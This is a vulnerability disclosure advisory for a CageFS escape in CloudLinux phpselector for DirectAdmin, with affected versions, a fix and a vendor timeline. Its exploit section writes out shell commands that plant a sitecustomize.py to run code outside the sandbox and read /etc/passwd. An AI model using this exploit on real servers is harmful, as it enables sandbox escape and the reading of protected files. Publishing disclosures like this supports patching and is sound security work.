Vulnerability

Affected software: lvemanager versions below 5.0.8.1-1, lve-utils versions below 3.1.10.1-1, lve-stats versions below 2.9.4.1-1

CloudLinux phpselector for DirectAdmin is written in python. When phpselector script is executed by DirectAdmin, it tries to load modules from /home/USER/.local/lib/python2.7/site-packages/ before entering CageFS. By creating sitecustomize.py file, custom commands can be executed outside CageFS.

Exploit

$ mkdir -p /home/USER/.local/lib/python2.7/site-packages/
$ echo -e "import os\nos.system('/usr/bin/cat /etc/passwd > /home/USER/output')" > /home/USER/.local/lib/python2.7/site-packages/sitecustomize.py

Now go to DirectAdmin phpselector plugin and click "Save".

Solution

Update lvemanager to 5.0.8.1-1 or later, lve-utils to 3.1.10.1-1 or later, lve-stats to 2.9.4.1-1 or later.

Timeline

  • 2019-08-12 - Vulnerability reported to vendor.
  • 2019-08-12 - Response from vendor, task WEB-1552 assigned.
  • 2019-10-09 - Production version 5.1.2-1 of lvemanager, 3.1.10.1-1 of lve-utils, 2.9.4.1-1 of lve-stats released with WEB-1552 vulnerability fixed.